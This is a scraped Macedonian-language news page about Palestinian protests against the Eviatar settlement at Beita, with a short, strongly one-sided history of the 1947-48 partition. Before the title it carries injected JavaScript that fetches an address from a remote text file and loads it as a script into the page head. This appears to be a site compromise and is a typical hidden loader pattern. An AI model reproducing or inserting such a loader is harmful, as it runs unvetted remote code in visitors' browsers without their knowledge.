;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); (Фото) Палестинците се спротивставуваат на нелегално населување на Бејта - Антропол
АктуелноИнтернационално

(Фото) Палестинците се спротивставуваат на нелегално населување на Бејта

Палестина е територија населена со жители од еврејско и арапско потекло. На оваа територија. постои држава наречена Израел, прогласена на 14 мај 1948 година. Тој ден завршил мандатот на окупација на Британската империја од времето на Првата светска војна. Евреите, уште пред почетокот на Втората светска војна, планирале создавање на држава во Палестина. Британската влада се спротиставувала на овој процес, но без успех. Некаде на почетокот на 1947 година, интервенирале и Обединетите нации.

Препораките на ООН биле поделба на Палестина со Ерусалим како меѓународно управуван град. Палестинските Арапи, кои биле 70% од населението и поседувале 92% од територијата добиле 47% од земјата (Резолуција на ООН 181) што претставувало страшен егзодус над палестинскиот народ. Кога Специјалниот комитет за Палестина при ООН гласал за поделба, 33 гласа биле за, 13 против, а 10 воздржани.

Арапите не се согласиле со поделбата од 1947 година и охрабрени (и вооружени) од британската влада се подготвувале за војна против ционистите и создавањето на еврејската држава.

Во мај 1948 година, арапските режими околу Израел извршиле напад над еврејската држава во зародиш. Британската војска се повлекла и им дозволила на арапските војски да навлезат во Палестина, а истовремено ги затворила пристаништата за дотур на оружје на Евреите. И покрај ова, Арапите биле поразени. Израел, наместо да ја почитува поделбата од 1947 година, со војска освојува поголема територија.



После 1948 година, Палестинците континуирано се иселувани од сопствените имоти, под изговор дека се работи за краток временски период и повторно ќе бидат вратени. Илјадници Палестинци ги напуштиле своите домови и никогаш повеќе не се вратиле на нивните имоти и тоа трае и ден денешен. 

Во продолжение галерија на слики на Палестинци кои се спротивставуваат на нелегално населување на Бејта,  јужно од Наблус, во окупираниот Западен брег. Нелегалната формација „Евјатар“ која делува на планината Сабих во Беита, тероризира три различни палестински села, што им го отежнува животот на жителите.

Како одговор на тоа Палестинците предизвикуваат немири, организираат ноќни протести, палат гуми и користат ласерски покажувачи за да сигнализираат дека израелските доселеници нема да имаат мирен сон на украдената земја.